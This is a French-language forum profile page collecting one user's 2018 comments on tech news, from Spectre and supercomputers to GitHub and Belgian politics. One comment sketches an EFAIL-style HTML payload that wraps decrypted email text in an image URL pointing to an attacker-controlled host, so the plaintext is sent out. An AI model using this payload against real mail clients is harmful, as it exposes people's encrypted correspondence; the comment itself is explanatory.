votre avatar

33A20158-2813-4F0D-9D4A-FD05E2C42E48

est avec nous depuis le 13 novembre 2014 ❤️

1718 commentaires

Le 16/10/2018 à 09h 48

“L’ambassadeur américain en Belgique, Ronald Gidwitz, a prévenu que les Etats-Unis ne prolongeraient pas indéfiniment et sans modification leur offre pour le chasseur F-35 du groupe Lockheed Martin comme successeur des F-16 vieillissants, qui expire le 14 octobre, par ailleurs date des élections communales.”



Devinez quel jour c’est arrivé ? Trois jours avant. COMME PAR HASARD !!!!



Source :&nbsphttps://www.levif.be/actualite/belgique/remplacement-f-16-les-americains-pressen…



 



 

Le 16/10/2018 à 09h 33

Ouais, heu… Tout ce que vous craignez que votre gouvernement va vous faire, chez nous il l’a déjà fait hein…



Le prélèvement à la source, on l’a depuis toujours (et ça ne pose aucun problème)

La retraite à 67 ans.

La semaine de 38 heures.

Les pensions rikiki

13 niveaux de pouvoir entre l’état fédéral tout en haut et les communes tout en bas

Les hommes politiques à casseroles multiples

La limitation à 70 (oui, oui, septante) au lieu de 90 (nonante) sur toutes les routes secondaires.

 

Arrêtez un peu une fois de vous plaindre.

 

Le 16/10/2018 à 09h 23

Les journaux belges sont - étonnamment&nbsp;<img data-src=" /> - restés très discrets sur cet incident. Par contre, quand les vôtres fument rouge au lieu de bleu, ils en ont ri pendant trois semaines.



Quelqu’un peut me donner le lien pour demander l’asile politique en France ? Je ne fais plus confiance en mes compatriotes armés.<img data-src=" />&nbsp;<img data-src=" /><img data-src=" />

Le 16/10/2018 à 09h 44

Pareil. En dual UHD (4K) j’en prenais deux :-)

Le 12/10/2018 à 11h 53







Perfect Slayer a écrit :



Et toujours pas de modèle symétrique pour les gauchers… <img data-src=" />





Heu, la seule touche non symétrique c’est la 24 en bas à droite. Le petit doigt pour les droitiers, le pouce pour les gauchers, on survivra.


Le 10/10/2018 à 14h 21

Ca s’appelle un side channel et c’est loin d’être anecdotique. Le chip peut subtilement altérer l’ordonnancement des paquets sortants, ou leur MTU, ou leur bit de fragmentation pour faire sortir (quelques bits à la fois) les données récupérées depuis la RAM. Cent bits par jour suffisent à compromettre une clé privée en un temps raisonnable.



Bien sûr ça ne suffit pas en tant que tel, mais si dans les backbones des routeurs sont également compromis, ils pourraient intercepter les paquets et reconstituer l’information.

&nbsp;

Le 12/09/2018 à 15h 39







WereWindle a écrit :



En fait, maintenant, c’est quand la R&D est dédiée à un autre sujet que je suis surpris <img data-src=" />





Naaann… Y’a aussi la blockchain qui nécessite beaucoup de R&D ! La blockchain c’est l’avenir ! Il reste tant à faire.



Bientôt votre chasse d’eau ne fuira plus. Grâce à la blockchain auto-colmatante.

Bientôt vous ne perdrez plus vos lunettes, elles seront partout à la fois. Grâce à la blockchain répartie.

Bientôt vous pourrez avoir une femme et une maîtresse sous le même toit sans qu’elles se crêpent le chignon. Grâce aux forks dans une blockchain.

&nbsp;

&nbsp;


Le 10/09/2018 à 08h 58

Ah zut, moi qui comptais mettre à jour tous mes XP vers 7 à Noël 2019…

Le 07/09/2018 à 09h 45







TheJester a écrit :



Grande question, vous dites Bé-ème-double-Vé, ou Bé-ème-Vé ? :p





En Belgique c’est plutôt “bé ème Oué” puisqu’on prononce W comme “ou” court : wagon -&gt; ouagon, bon ouékenntt


Le 31/08/2018 à 09h 11







Patch a écrit :



Suffit de regarder le message du CERT : seul 10 serait touché.





Hmmmm… C’est pas ce que je lis. Le PoC tel que proposé ne marche effectivement que sur Windows 1064 (et 2016) mais rien ne prouve que les versions antérieures sont immunisées.

&nbsp;


Le 29/08/2018 à 06h 51







Demilitarized Zone a écrit :



Ou pire, par des GUID.





Je me demande bien qui serait assez stupide pour utiliser un GUID comme identifiant…

&nbsp;


Le 28/08/2018 à 14h 08







tazvld a écrit :



Du coup, le câble ne sera que pour les service Google ou d’autre pourront l’utiliser ?

je ne sais pas trop comment ça marche en temps normal : les câbles sont surement privés et j’imagine que les opérateurs paient pour pouvoir s’y connecter ?





Sans en être sûr,ce que je comprends c’est que si tu héberges tes services Google Cloud à Honfleur, tu auras un câble transatlantique pour faire passer tes data vers un client à New York.


Le 28/08/2018 à 12h 17







Transistance a écrit :



Qui saurait m’expliquer pourquoi baptiser un câble ?





Pour pouvoir en parler dans une conversation autrement que par un nom de code obscur. Plein de sociétés font ça, par exemple les constructeurs automobiles donnent des noms à leurs modèles. T’imagines le boxon si un constructeur automobile désignait tous ses modèles par des nombres ?

&nbsp;


Le 27/08/2018 à 13h 34







eglyn a écrit :



Ouais d’ailleurs c’est vraiment le truc qui me saoule sur Netflix, ils virent les génériques de fin pour balancer une suggestion qui se lance 10 sec après… <img data-src=" />





Sur Orphan Black, c’est carrément les quelques dernières minutes de l’épisode qui sont sucrés chez moi.&nbsp;<img data-src=" />


Le 13/07/2018 à 04h 45

You cannot change the laws of physics, Jim !



Hé oui, aux vitesses d’horloge actuelles, les contraintes physiques sur les délais de transmission deviennent un mur infranchissable. À 4Ghz, la lumière fait 7.5 cm à chaque cycle (les électrons dans un fil conducteur encore bien moins).



C’est pas assez pour aller du CPU à la RAM et retour. Soit le CPU se tourne les pouces en attendant, soit il démarre déjà l’exécution des instructions suivantes.

Le 12/07/2018 à 13h 40







Groupetto a écrit :



[…]

Perso je donnerais bien 20% de perfs pour ne plus jamais avoir à suivre ces histoires de Spectre.





Prolégomènes : tous les chiffres qui suivent sont tirés d’études rigoureusement aléatoires appelées communément “pifomètre”.

&nbsp;

Désactiver l’exécution spéculative te fera perdre bien plus que 20% de perfs…&nbsp; En ne considérant que les stall à chaque instruction conditionnelle, je dirais au minimum 50%, et je ne serais pas étonné que ce soit 75% au vu de la taille des pipelines.



Par ailleurs, la première faille (meltdown) n’avait pas besoin d’exécution spéculative, il ne faisait qu’exploiter le pipeline. Si tu supprimes totalement le pipeline, tu divises les perfs par 10.

&nbsp;


Le 06/07/2018 à 09h 03

Euuuh, c’est déjà le cas en Gelbique hein, la carte d’identité (au format carte de crédit) sert aussi d’identification pour les mutuelles. Elle a une puce, un code PIN pour masquer les données confidentielles. Elle possède même une clé de signature électronique authentifiée par l’État belge, pouvant servir à signer des actes administratifs et se connecter aux services fédéraux en ligne.



Si on y est arrivé, vous devriez pouvoir faire de même…

&nbsp;

Le 05/07/2018 à 07h 51

<img data-src=" />

Le 04/07/2018 à 13h 15

Pas mort, mais 41 qubits, c’est juste un trop peu pour répondre aux questions existentielles.&nbsp;

Si je croise l’ingénieur qui a fait ça, je lui remonte les bretelles (d’autoroute)

&nbsp;

Le 28/06/2018 à 13h 25







triton a écrit :



&nbsp;(et pour le coup, matériellement).





Avec un peu de chance, le protocole est dans le firmware et on peut le re-flasher (hormis la vitesse de transfert - 128To à 10Mbps va falloir être patient…)&nbsp;


Le 28/06/2018 à 11h 02

Je suspecte que SDXC était limité par la capacité d’adressage du bus&nbsp; ( = nombre de bits des numéros de bloc) genre 32 bits x 512 bytes = 2To ; donc pour passer outre, il a fallu passer à (je tape au hasard) 48 bits pour les numéros de blocs, donc une modification du microcontrôleur.

&nbsp;

Mais tout ceci n’est que des supputations.

Le 28/06/2018 à 07h 50







Bejarid a écrit :



C’est un autre sujet ça déjà. Maintenant c’est plus le fait que ça soit généraliste qui pose débat, c’est son intérêt…



[…]



     &nbsp;           

Ça c'est intéressant. Mais vos délires sur "ouais mais non c'est pas généraliste", "et puis c'est quoi généraliste", "ça sert à rien le HPC" ou "papa comment on fait une bouteille de lait", faut arrêter les mecs, on se croirait en maternelle là.







Gni ? Quel délire ?



Je me contente justement de dire que ce débat n’a pas de sens puisque les machines en question n’ont pas vocation à faire autre chose que du number crunching à haute dose pour des applications très précises.


Le 27/06/2018 à 15h 43







Bejarid a écrit :



A la différence des systèmes basés sur des GPU, les systèmes basé sur des Phi sont : x86, bootable, directement sur le bus mémoire (contrairement aux GPU qui sont derrière le PCIe).



[…]





On est parfaitement d’accord sur tous ces points… Mais qui ne répondent pas à la question&nbsp;d’ordre plus général. Ces supercalculateurs sont certes basés sur des processeurs “généralistes” de manière individuelle, mais la machine complète mérite-t-elle ce qualificatif ?



Oui bien sûr on va arriver à installer Oracle (ou nginx, voire même IIS si on est taquin) à partir d’une distribution standard. Mais après ? Il y a de fortes chances que les interconnexions multi-Tbps&nbsp; entre les noeuds et l’accès mémoire NUMA ne sont pas du tout adaptés à la charge de travail de ces applications qui ne sont pas conçues pour les exploiter.



J’arrive à booter Windows 95 sur deux noeuds ? La belle affaire ! Pendant ce temps-là, les 65534 autres ne font rien.



Kestananafoutt si les processeurs sont généralistes ou hyper spécialisés, puisqu’on ne fera jamais tourner un soft généraliste sur ces bidules dont l’unique but dans la vie c’est d’inverser des matrices plus vite que Chuck Norris n’envoie des tatanes à la tronche des méchants dans Call of Warhammer Legends.


Le 27/06/2018 à 11h 05

Et tout dépend de ce qu’on appelle généraliste… Ces machines sont construites pour résoudre une classe particulière de problèmes - faisant largement appel à de l’algèbre linéaire sur des matrices gigantesques de nombres flottants - et sont probablement très mauvaises à d’autres tâches. Par exemple je ne suis pas sûr qu’elles sont à l’aise sur les problèmes discrets comme la cryptographie ou combinatoires comme jouer aux échecs. Ni même comme serveur de base de données.



C’est pas pour rien que les puissances sont estimées en faisant tourner LINPACK et pas Call of Duty.

Le 27/06/2018 à 06h 44











akwa a écrit :



Certes mais il n’en demeure pas moins qu’il n’est pas spécialisé et qu’il est possible de n’utiliser que les xeons.

Donc c’est un peu de la fumisterie de se prétendre plus puissant ordinateur généraliste d’Europe…





Il n’en demeure pas moins que si tu n’utilises que les Xeon, tu passes largement en-dessous de la barre des 10 PetaFLOPS au lieu de 25…


Le 20/06/2018 à 13h 04

Moi je vois comme avantage que le coursier sonne chez toi puis si tu ne réponds pas met dans le casier immédiatement. Tout se passe en une fois, il ne doit pas retourner à la camionnette avec le paquet pour aller le mettre à la consigne 5 min plus tard. Il y a moins de risque de confusion ou de perte.

Le 20/06/2018 à 10h 19







vampire7 a écrit :



Ce problème ne sera résolu que s’il n’y a pas de saisie manuelle à faire, genre n° de casier.

Et il faut aussi éviter que la livraison soit faite par l’un des kleptomanes de la Poste, parce que rien n’empêche le gars de dire qu’il a posé son colis et de le garder pour lui.





Ce qui se règle aisément avec une petite webcam qui filme l’intérieur du casier pendant que la porte est ouverte. Si on ne voit pas la main du postier mettre un truc dans la boîte, ou si on voit la main du destinataire qui retire le truc en catimini, ben, heu… voilà quoi on sait qui ment. Sans bien sûr que ce soit une preuve admissible à un procès mais quand-même ça évite les tentations.


Le 18/06/2018 à 11h 41

<img data-src=" /><img data-src=" /><img data-src=" /><img data-src=" />



&nbsp;Le but de la science est de faire avancer la connaissance.



&nbsp;Elaborer et tester des théories est la méthode la plus couramment admise pour arriver à ce but.



&nbsp;<img data-src=" /><img data-src=" /><img data-src=" /><img data-src=" />

Le 18/06/2018 à 11h 24

Ce sont deux aspects complémentaires qui ne sont pas nécessairement l’oeuvre d’une seule personne. Un scientifique&nbsp; (appelons-le par exemple Sheldon) sera plus à l’aise en échafaudant des théories abstraites, tandis qu’u autre (appelons-les, toujours au hasard, Leonard) sera plus enclin à réaliser des expériences qui tentent de confirmer ou d’invalider les théories. Non qu’ils soient incapables d’endosser l’autre casquette (*), mais ce sont quand-même des façons de penser fort différentes.





&nbsp;

(*) Ou je sais, la métaphore est foireuse.

Le 14/06/2018 à 10h 15

Y’a ça aussi … (y’en a plusieurs et c’est dans la même veine, j’en mets juste une)



http://www.commitstrip.com/en/2017/08/08/meanwhile-on-mars-12-birthday-party/

&nbsp;

Le 13/06/2018 à 09h 53

Pareil, toujours pas compris pourquoi il faut des effets quand on change de page (surtout quand on veut passer rapidement de l’une à l’autre pour comparer) Et prions pour qu’ils ne remettent pas clippy.

Le 13/06/2018 à 06h 58

Et encore ! Auto hébergement chez soi à la maison ! Sinon qui lui garantit que le fournisseur ne va pas installer un espion sur la machine et relayer le repo git vers Microsoft, Apple et Google ?



&nbsp;

Le 12/06/2018 à 09h 41

Faudrait arrêter avec la paranoïa à deux balles avec ce droit de piocher dans les données privées. Microsoft est un acteur majeur du cloud. Analyser les habitudes sur les repos publics, ils pouvaient déjà.&nbsp;&nbsp;S’ils espionnent les repos privés et se font prendre, c’est toute la croissance d’Azure qui en prend pour son grade.



Et puis, aussi, il faudra se faire à l’idée que Microsoft gère déjà une quantité faramineuse de documents privés via Office 365, OneDrive, l’analyse des crash dumps, les tableaux de bord hébergés dans Azure, les serveurs TFS et GIT hébergés chez eux (dont notamment à visualstudio.com, qui offre … des repos privés… Non ? Si ! Ah !!!!) et que c’est pas Github qui changera fondamentalement la donne.



&nbsp;

Le 12/06/2018 à 14h 58

MacOs sur des processeurs powerpc ? Version 9 alors&nbsp;<img data-src=" />

Le 12/06/2018 à 12h 13

Qu’est-ce que tu veux mettre d’autre ? Le but est la puissance brute donc un noyau qu’on peut customiser / bidouiller pour retirer l’inutile : pas de temps réel, pas de HID, pas besoin d’animation de Clippy non plus, ni de télécharger un patch de sécurité en tâche de fond.

Le 11/06/2018 à 08h 59

Les plus gros coûts liés au refroidissement sont justement qu’il faut consommer de l’énergie supplémentaire pour évacuer la chaleur des datacenters. Si la chaleur s’évacue naturellement sans avoir besoin de circulations forcées et autres compresseurs de fréon, on consomme moins d’énergie. Donc en plus d’économiser des sous, on réchauffe moins la planète.&nbsp;<img data-src=" />

Le 07/06/2018 à 14h 47

Oui, mais est-ce que cette extension sera maintenue pendant 17 ans ?

&nbsp;

Le 30/05/2018 à 08h 45

Vu le nombre de radars (pour votre sécurité), déviations (pour votre confort) et autres voies fermées (pour fluidifier le trafic) que ce genre de machine doit garder en mémoire, ça ne m’étonne que modestement qu’elle se mette à surchauffer…

Le 29/05/2018 à 13h 05







fred42 a écrit :



Un CD ? C’est tellement has been ! <img data-src=" />





Ah ben non c’est pas has been, un CD c’est la version sans contact du vinyle…


Le 17/05/2018 à 09h 48

Honnêtement, en lisant le titre, j’avais pas bien compris comment appliquer une transformée de Fourier rapide sur un téléphone le rendait plus facile à recycler…

Le 16/05/2018 à 15h 44







Ramaloke a écrit :



Vive le SI (Système International), un jour les USA aussi s’y mettront…un jour :p





Oui, le Octobre 24, 2094 à 12:00PM précises&nbsp;<img data-src=" />


Le 16/05/2018 à 14h 25

Sauf que la taille des écrans est systématiquement donnée par la diagonale (en pouces), alors si si on a une bonne idée de ce qu’ils ont voulu dire, même si effectivement le choix des mots est discutable (et le calcul faux…) tout ça parce que&nbsp; :



https://saviezvousque.net/encore-une-journee-qui-sacheve-sans-que-jai-eu-besoin-…

&nbsp;

Et par ailleurs, un pouce carré ça existe, c’est même la base de l’unité de pression US (PSI : Pound per Square Inch)&nbsp;

Le 16/05/2018 à 14h 18

En quoi c’est tâtillon ? C’est pas “hyper gênant”, c’est juste que c’est arbitraire, il n’y a pas de raison technique fondamentale à se limiter à 4 écrans. Donc ça pue la segmentation commerciale du genre “si vous trouvez que 4 écrans ça coûte bonbon, attendez de voir le prix de notre version gold, qui en supporte 8, ou notre version diamond qui en supporte 16”.

Le 16/05/2018 à 10h 31

Pourquoi seulement 4 ? Que pour des raisons internes à GDI ou DirectX l’affichage soit limité à 32000x32000 pixels, je suis prêt à l’admettre, mais là on en est loin : 8640x3840.



Encore une décision marketing&nbsp; &nbsp;&nbsp;<img data-src=" />



Edit : j’avais pas bien capté le “ratio 32” mais ça ne change rien aux ordres de grandeur…

Le 14/05/2018 à 12h 31

Hmmm donc, apparemment, le truc est d’envoyer un message comportant trois parties MIME correspondant au corps HTML du message.







  • La première partie contient ce code, que j’encrypte avec la clé publique de la cible : &lt;html&gt;&lt;body&gt;&lt;img src=“urlquejecontrôle/

  • La deuxième contient le message que je veux déchiffrer,que je ne re-chiffre évidemment pas

  • La troisième contient&nbsp; “/&gt;&lt;body&gt;&lt;/html&gt;





    Le client mail déchiffre individuellement les trois parties, les concatène en un seul bloc et tente d’afficher :



    &lt;html&gt;&lt;body&gt;&lt;img src=“urlquejecontrôle/texteclairdumessage”/&gt;&lt;body&gt;&lt;/html&gt;



    Le serveur à urlquejecontrôle n’a plus qu’à logger la requête et paf j’ai déchiffré le message…



    &nbsp;

Le 14/05/2018 à 09h 48

Non, on continue à chiffrer, mais on désactive le déchiffrement automatique, c’est lui qui provoque les soucis. Il est manifestement possible d’inclure des données vérolées (peut-être dans la chaîne de certificats) qui font que l’outil de déchiffrement fait leaker des clés de session.



Les utilisateurs doivent alors déchiffrer manuellement les messages, uniquement en provenance des personnes qu’elles connaissent, et si possible en vérifiant les chaînes de confiance dans un outil externe qui ne fait que ça.

&nbsp;

Le 03/05/2018 à 12h 10

Et si tu renverses une tasse de café, et si tu la laisses tomber par terre, si tu la coinces dans la porte, si tu la ranges au soleil… Avec les quantités dont on parle, les bandes magnétiques ne sont généralement plus manipulées par les doigts potelés d’un humain, c’est un robot de chargement qui les met dans le lecteur et elles restent en sécurité dans un conteneur résistant au feu.

Le 03/05/2018 à 09h 48

C’est forcément le serveur qui doit hacher, sinon c’est fonctionnellement équivalent à stocker le mot de passe en clair…&nbsp;



Si le hachage se fait exclusivement au niveau du client :

&nbsp; 1) L’utilisateur tape son password “MDP123”

&nbsp; 2) Le client hache le password vers 0x12345678 et l’envoie au serveur

&nbsp; 3) Le serveur vérifie qu’il y a bien 0x12345678 dans la database



FAIL ! Si un pirate obtient une copie de la database, il peut se logger en envoyant 0x12345678 au serveur sans avoir besoin de connaître “MDP123”.

&nbsp;

&nbsp;



&nbsp;



&nbsp;

Le 03/05/2018 à 07h 43

Tout ce qui concerne l’attribution de droits au travers du réseau. De manière générale, dès que tu essaies de te connecter à différents partages via des noms d’utilisateur variés, ça finit toujours par cafouiller.

Le 02/05/2018 à 11h 21

Comme c’est basé sur la même technologie de pointe usine à gaz, c’est normal.